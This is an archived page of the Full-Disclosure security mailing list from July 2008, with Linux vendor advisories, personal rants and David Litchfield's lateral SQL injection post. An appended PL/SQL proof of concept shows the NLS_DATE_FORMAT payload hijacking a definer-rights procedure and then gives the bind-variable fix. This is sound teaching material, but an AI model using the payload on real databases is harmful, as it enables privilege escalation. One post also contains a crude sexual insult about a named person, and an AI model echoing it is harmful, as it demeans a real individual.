security | 20 Jul 01:04

[ MDVSA-2008:150 ] - Updated mysql packages fix vulnerabilities


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:150
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mysql
 Date    : July 19, 2008
 Affected: 2007.1, 2008.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Multiple buffer overflows in yaSSL, which is used in MySQL, allowed
 remote attackers to execute arbitrary code (CVE-2008-0226) or cause
 a denial of service via a special Hello packet (CVE-2008-0227).

 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement; as
 well it would not, under certain conditions, prevent two databases
 from using the same paths for data or index files.  This could allow
 an authenticated user with appropriate privilege to create tables in
 one database to read and manipulate data in tables later created in
 other databases, regardless of GRANT privileges (CVE-2008-2079).

 The updated packages have been patched to correct these issues.

n3td3v | 19 Jul 22:40

Re: Torvalds attacks IT industry 'security circus'

On Sat, Jul 19, 2008 at 7:34 PM, php0t <php0t <at> zorro.hu> wrote:
>
> If I didn't feel you were moving towards being-serious-about-it, I'd give
> you a cookie for writing up so many useless, senseless, and obviously
> provocative thoughts about a subject where you lack even the slightest
> competence.
>
> P.
>

Blame Torvalds and Cnet News if you want to talk about provocative,
they are the ones that made me do the rant, if it wasn't for them I
would have no fuel for my rant I'm passionate about. So if you want to
know who is provocative it's Torvalds and Cnet News.

Ever since Robert Lemos published a story about me I've been against
media outlets talking about mailing list comments, it's wrong. Nobody
wants their mailing list comments quoted in the media and I wish
Securityfocus and Cnet News would stop it.

A few drunken rants of mine were taken and put into a PDF file and
written in a Securityfocus news article by Robert Lemos, and you know
the government or whoever might have thought it was true because it was
written by people who thought they knew what they were talking about.

The truth is, three people were n3td3v? No it was probably just me in
three states of sober, drunk and hungover if the Neal Krawetz thing is
anything to be taken seriously.

And the n3td3v is a hacker group who targets Yahoo, Microsoft and

security | 19 Jul 21:39

[ MDVSA-2008:149 ] - Updated mysql packages fix vulnerabilities


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:149
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mysql
 Date    : July 19, 2008
 Affected: 2008.1
 _______________________________________________________________________

 Problem Description:

 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement; as
 well it would not, under certain conditions, prevent two databases
 from using the same paths for data or index files.  This could allow
 an authenticated user with appropriate privilege to create tables in
 one database to read and manipulate data in tables later created in
 other databases, regardless of GRANT privileges (CVE-2008-2079).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:


n3td3v | 19 Jul 20:27

Torvalds attacks IT industry 'security circus'

The maker of Linux was right,

"In an e-mail to the Linux kernel developer mailing list, Torvalds
said a section of the security industry was dedicated to finding bugs
in software only to publicize their findings and gain notoriety."

http://news.cnet.com/Torvalds-attacks-IT-industry-security-circus/2100-1007_3-6243900.html

We've got to stop doing an HD Moore to make a name for ourselves and
release vulnerabilities for the right reason, not to become a cyber
security rock star!!!

The security industry is a circus, it's a joke what it's turned into,
it's not about security anymore, it's a media circus, with over hype and
over drive.

Let's cut away with the elitism and become normal people again who
aren't pumped up on steroids everyday to become famous.

The media are to blame, the Robert Lemos's and the others, they write
shit all the time just to make their companies ad-click money, they
don't really care what's written, as long as it's security related they
don't care.

As little research as possible and the most amount of over steer to
make the security industry sound more important and exciting than it
is.

Security, it's a dull field to be in, once you know it all you really
do know it all. It's a boring sport being a security professional.


rPSA-2008-0231-1 bind bind-utils

rPath Security Advisory: 2008-0231-1
Published: 2008-07-19
Products:
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Weakness
Updated Versions:
    bind=conary.rpath.com <at> rpl:2/9.4.2_P1-2-0.1
    bind-utils=conary.rpath.com <at> rpl:2/9.4.2_P1-2-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2378
    https://issues.rpath.com/browse/RPL-2563
    https://issues.rpath.com/browse/RPL-2657

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447

Description:
    Previous versions of the bind package are vulnerable to a
    cache-poisoning attack due to a weakness in the DNS protocol.
    This update improves bind's resilience to this attack; however,
    it does not provide a definitive solution.

    Additionally, the bind package has been updated with root
    nameserver information, including the new IP address for 
    the "L" root nameserver.


Joxean Koret | 19 Jul 17:06

Oracle Database Local Untrusted Library Path Vulnerability

Oracle Database Local Untrusted Library Path Vulnerability
----------------------------------------------------------

The Oracle July 2008 Critical Patch Update fixes a vulnerability which
allows a user in the OINSTALL/DBA group to escalate privileges to root.

Escalating Privileges from "oracle" to "root"
---------------------------------------------

In Oracle 10g R2 and later (Oracle 11g is also vulnerable) the affected
binary, $ORACLE_HOME/bin/extjob, is SUID root and must be SUID root. In
the following forum from Oracle you will find a note at the bottom of
the page:

(...)
 In 10.2.0.2 and higher

 rdbms/admin/externaljob.ora file must be owned by root:oraclegroup
and
 be writable only by the owner i.e. 644 (rw-r--r--)

 bin/extjob file must be also owned by root:oraclegroup but must be
 setuid i.e. 4750 (-rwsr-x---)

 bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned
by
 oracle:oraclegroup

 In 11g and higher


Kingcope Kingcope | 18 Jul 19:55

AFK from full-disclosure

I am reachable
0nly <at> two addresses from now on:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
n3td3v | 19 Jul 03:56

Fwd: Stop The 70% Lie

---------- Forwarded message ----------
From: n3td3v <xploitable <at> gmail.com>
Date: Sat, Jul 19, 2008 at 12:13 AM
Subject: Re: Stop The 70% Lie
To: The Security Community <thesecuritycommunity <at> gmail.com>

On Sat, Jul 19, 2008 at 12:08 AM, The Security Community
<thesecuritycommunity <at> gmail.com> wrote:
> WTF is Gadi's problem, anyway?
>

He's fat and no chicks will fuck him. lol.


Kingcope Kingcope | 18 Jul 19:12

AFK from fool-disclosure

I am reachable
0nly <at> two addresses:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v


Signed,
KingCope


rPSA-2008-0230-1 bind bind-utils

rPath Security Advisory: 2008-0230-1
Published: 2008-07-18
Products:
    rPath Linux 1

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Weakness
Updated Versions:
    bind=conary.rpath.com <at> rpl:1/9.3.4_P1-0.5-1
    bind-utils=conary.rpath.com <at> rpl:1/9.3.4_P1-0.5-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2657

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447

Description:
    Previous versions of the bind package are vulnerable to a
    cache-poisoning attack due to a weakness in the DNS protocol.
    This update improves bind's resilience to this attack; however,
    it does not provide a definitive solution.

http://wiki.rpath.com/Advisories:rPSA-2008-0230

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


David Litchfield | 18 Jul 16:00

Lateral SQL Injection Revisited - No Special Privs Required

At the end of April 2008 I published a paper about a new class of flaw in
Oracle entitled "Lateral SQL Injection". 

The paper can be found here:
http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

Essentially the paper details a way in which the attacker can manipulate the
environment to trick an Oracle database into using arbitrary SQL in DATE
functions and data. 

A number of people at the time dismissed it as irrelevant because the
attacker required the ALTER SESSION privilege. Well, as it turns out, you
don't need the ALTER SESSION privilege at all. Here's why: there are certain
ALTER SESSION statements that can be executed even though the user doesn't
have the ALTER SESSION privilege. The statements that can be executed
without the privilege include those that relate to National Language
Support. Thus a user without ALTER SESSION privileges can change the date
format and so employ a lateral SQL injection attack. The script below shows
this in action. We connect to a fully patched 11g server and confirm we only
have CREATE SESSION privileges - i.e. the minimum we need to connect to the
server - everyone gets this privilege. We then issue an ALTER SESSION
statement to try to set SQL_TRACE to true. As expected this fails with an
insufficient privileges error. But then we issue an ALTER SESSION to set
the NLS_DATE_FORMAT and this succeeds. Lastly we call the SYSDATE function
to confirm it took.

C:\>sqlplus /nolog

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Jul 18 14:47:17 2008

Copyright (c) 1982, 2007, Oracle.  All rights reserved.

SQL> connect testuser1/testuser1
Connected.
SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION

SQL> alter session set sql_trace = true;
alter session set sql_trace = true
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> alter session set nls_date_format='"'' and myfunc()=1--"';

Session altered.

SQL> select sysdate from dual;

SYSDATE
------------------
' and myfunc()=1--

SQL>

Thus we can see that no special privileges are required to effect a lateral
SQL injection attack. I suppose I should have spotted this at the time.
Cheers,
David

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402

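What the NLS_DATE_FORMAT trick above does to a real piece of PL/SQL, as an added example in Oracle SQL*Plus syntax that is not part of David Litchfield's post or paper. It shows a definer-rights procedure that concatenates SYSDATE into dynamic SQL, the exact date-format payload from the post being used to smuggle a predicate into that SQL, and a rewrite that passes the date as a bind variable so the session's NLS settings can no longer reach the statement text. The table `visits`, the procedure names, the `attacker` account and the `proof` table are hypothetical; `myfunc` is the placeholder name used in the post. Creating the function needs CREATE PROCEDURE on the attacker's side; the post's point is only that the date-format step needs no ALTER SESSION privilege.

```sql
-- Added example, not from the original post. Oracle SQL*Plus / PL/SQL.
-- All object and account names are hypothetical.

---------------------------------------------------------------------------
-- 1. Owner session (a privileged schema, e.g. an application DBA account)
---------------------------------------------------------------------------
CREATE TABLE visits (page VARCHAR2(100), visited DATE);

-- VULNERABLE: a definer-rights procedure (the default) that builds its SQL
-- by string concatenation. SYSDATE is a DATE, so the concatenation forces an
-- implicit DATE -> VARCHAR2 conversion, and that conversion uses the
-- NLS_DATE_FORMAT of the *calling* session. The caller therefore controls
-- text that is spliced straight into the statement.
CREATE OR REPLACE PROCEDURE count_visits_since_now (p_count OUT NUMBER) AS
  v_sql VARCHAR2(4000);
BEGIN
  v_sql := 'SELECT COUNT(*) FROM visits WHERE visited > ''' || SYSDATE || '''';
  DBMS_OUTPUT.PUT_LINE('executing: ' || v_sql);   -- show the generated text
  EXECUTE IMMEDIATE v_sql INTO p_count;
END;
/
GRANT EXECUTE ON count_visits_since_now TO attacker;

---------------------------------------------------------------------------
-- 2. Attacker session
---------------------------------------------------------------------------
-- A function that records who it actually ran as. AUTHID CURRENT_USER makes
-- it execute with the privileges of the current user at call time; when it is
-- reached from inside a definer-rights procedure, that current user is the
-- procedure's owner, not the attacker.
CREATE TABLE proof (ran_as VARCHAR2(30), ran_at DATE);

CREATE OR REPLACE FUNCTION myfunc RETURN NUMBER AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;   -- allow the INSERT from within a query
BEGIN
  INSERT INTO proof VALUES (SYS_CONTEXT('USERENV', 'CURRENT_USER'), SYSDATE);
  COMMIT;
  RETURN 1;
END;
/

-- The payload from the post. Text inside double quotes in a date format model
-- is emitted literally, so every DATE -> string conversion in this session now
-- yields:  ' and myfunc()=1--
-- This ALTER SESSION is an NLS setting and needs no ALTER SESSION privilege.
ALTER SESSION SET NLS_DATE_FORMAT = '"'' and myfunc()=1--"';

-- Call the victim procedure. The generated statement becomes
--   SELECT COUNT(*) FROM visits WHERE visited > '' and myfunc()=1--'
-- The "--" comments out the closing quote and myfunc() is now part of the
-- WHERE clause of SQL executed by the procedure owner.
SET SERVEROUTPUT ON
VARIABLE n NUMBER
EXEC owner.count_visits_since_now(:n)

-- Check whose identity the injected function ran under.
SELECT ran_as, TO_CHAR(ran_at, 'YYYY-MM-DD HH24:MI:SS') FROM proof;

---------------------------------------------------------------------------
-- 3. Owner session: the fix
---------------------------------------------------------------------------
-- Keep the DATE a DATE. A bind variable is passed as a typed value and is
-- never rendered as text, so NLS_DATE_FORMAT cannot alter the statement. If
-- a string really is needed, use TO_CHAR with an explicit format mask rather
-- than relying on the session default.
CREATE OR REPLACE PROCEDURE count_visits_since_now (p_count OUT NUMBER) AS
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM visits WHERE visited > :since'
    INTO p_count USING SYSDATE;
END;
/
```

Two things to check in an audit: any `EXECUTE IMMEDIATE` or `DBMS_SQL` call whose string is built with `||` and contains a DATE (or NUMBER, which has the same NLS_NUMERIC_CHARACTERS exposure), and whether the procedure is definer-rights and owned by a more privileged schema than its callers. The bind-variable rewrite fixes the first; `AUTHID CURRENT_USER` on the procedure, where the design allows it, removes the privilege gain from the second.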

